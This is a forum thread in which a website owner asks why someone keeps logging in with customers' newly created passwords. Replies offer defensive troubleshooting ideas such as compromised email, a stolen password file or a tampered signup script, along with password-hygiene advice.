Someone steals our customer passwords regularly
 

I noticed someone is accessing our site using our customers' passwords. He's using the same IP address (at least I know one of his IP addresses). He's using only selected passwords of the last day (He generally doesn't use older passwords). He sometimes shares a password with a few others.

I think he's not using brute force attack, because we log failed logins, nothing weird there...

He can access customers' mails (at least one of them), because I changed a password and emailed the customer, 5 minutes later he tried the new password.

If some password is used by a few different IP numbers in a day, it is suspended temporarily with a warning message. He sees the message and continously tries to enter for hours. He has other passwords but he insists on the latest one he has.

This is very weird. Does someone have any logical idea?

You sure it's not just the ip(s) of some web cache servers like AOL or some other big ISP?

these are the kinds of things you dont post on boards lol

Sounds like a torrent site ripper bot with a nice backdoor into a few people's PCs.

You might want to watch those signups and see if they have an affiliate in common, and also see how long before they cancel / chargeback / card reported stolen.

Yeah, it sounds like you have been hacked.

What is torrent site ripper? I scanned my computer with Kaspersky, Ad-Aware and Spybot. Nothing found... They don't have a common affiliate.

what he said... this even happens with some more localized isps

You sure its not specific clients sharing the passwords? Are you putting any kind of password strength to make sure they're not simple passwords?
WG

Do you have something such as strongboxxx protecting your members area?
Are you using totally random user/pass or letting people choose their own?
You aware one IP may be a proxy and it could be an entire forum using it?

the ip most probs will be a proxy............

Even if it's a proxy, one person is using it, and he gives away passwords to one or two people, or a limited group. I know he's one person using the proxy, because of cookies and browser info in the http headers are same...

Our visitors choose their passwords, but this guy doesn't enter a wrong password. He starts using it 15 minutes, or several hours after signup.

If you had access to the whole member database, wouldn't you try another username if the one you try is suspended because of multiple access?? Yes you would, but this guy doesn't try other ones, only the latest. This is weird. I think he can see new login pairs,

Don't know if you use pennywize, but i was stumped with a similar problem until I dumped them and went with strongbox......

hello man. are you receiving emails when new member arrived? if yes, go and change your email password now! what payment system do you use? it depends on it cause there are at least two payment system completely hacked so if you are on one of them it is the reason. so, change password to your email, change password to access your payment system account, change path to your .htpasswd and to your log and database files and if it will not help, change billing system ;) if this will not help, go and hire some security expert who will help you in few moments ;) best wishes with your sites!

Sounds like a bot to me, or a really really horny dude :1orglaugh

a few things should stand out to help explain what's going on..

#1
a real person doesnt repeatedly try a dead password this should be a pretty standard indicator this is a bot of some sort or a proxy

#2 if they are getting fresh passes with no common affiliate then there isnt too many holes. it has to be in the email or billing.. if the numbers are less than 10% then its possible its something like zango scooping the passes

but i would say theres a good pos your mail server is compromised and they are running the passes thru a proxy

is the ip close to thia
82.165.140.113

I'm far from an expert as I've had a few problems in this area myself, but I'd second the recommendation for YOU to change your password to your email. I might also recommend using Gmail or Hushmail and accessing both via https. Gmail defaults to non https, so you'll have to type in the https to access it via SSL and remain on SSL. These systems will not only encrypt your Username and Password, but also everything you send--but only if access via https.

Email is two way, so even if your security is good, there could be an issue on the end of your new user. Similarly, you don't know if they have other security problems--the customer is the person you have no control over.

Your own security is another matter. Take a look at your home security. Make a strong wireless password if accessing via wireless, and consider VPN if using a connection in a hotel as many hotels use hubs not switches--they don't care about your security.

It's also probably time to change your password on your server's control panel as well as well as all the sites. Make sure your passwords are strong. Need help generating strong passwords? See https://www.grc.com/passwords.htm for a free password generator.

Make sure your password file is not web accessable. Obvious, but you'd be surprised.

Make sure your members' user names and passwords are strong. Probably not happening if your users are selecting their own.

99 times out of 100 if someone gets ahold of someone else's password it's because it was "given" to them. Meaning the customer put it up at some password sharing board. I don't tell my customers that I have password protection scripts, so many don't think I'll catch them. While others will wait until near the end of their membership and then share it. I've given serious thought about hiring a collection agency to go after these customers for the extra bandwidth, but luckily my password protection script always catches this before long and cuts them off.

Also, why not block the IP? Of course he'll just find a way to access from another, but curious why you didn't try anyway.

If they seem to be getting passwords belonging to many different legitimate
users, they are likely ripping your password file. Here is the solution:
http://bettercgi.com/strongbox/passgen/

(See mainly the part about using modern encryption for the password file).

Also, very important. Don't use the same passwords for different things. For example, some of these Post Pic for Rating and Traffic sites are simply a trap to find out what User Name and Passwords you like to use. There are certainly many other types of sites out there doing the same. You sign up and then they'll use that user name and password to try to access you site, email, etc. So, make sure to use different passwords for different things.

Market your product less and write things that make sense. If they are ripping his password file (you wrote that), then your product is useless in that. Less false marketing, more support.

Actually the link I posted isn't for our product, it's information and a free tool
to stop password file ripping. before you tear into someone offering assistance,
it might be good to actually look at the link.

Back to the original topic, a cracker could have modified the processor's add
script to email them the new user names and passwords. Use ctrl-f in Notepad
or your favorite text editor and look for "sendmail".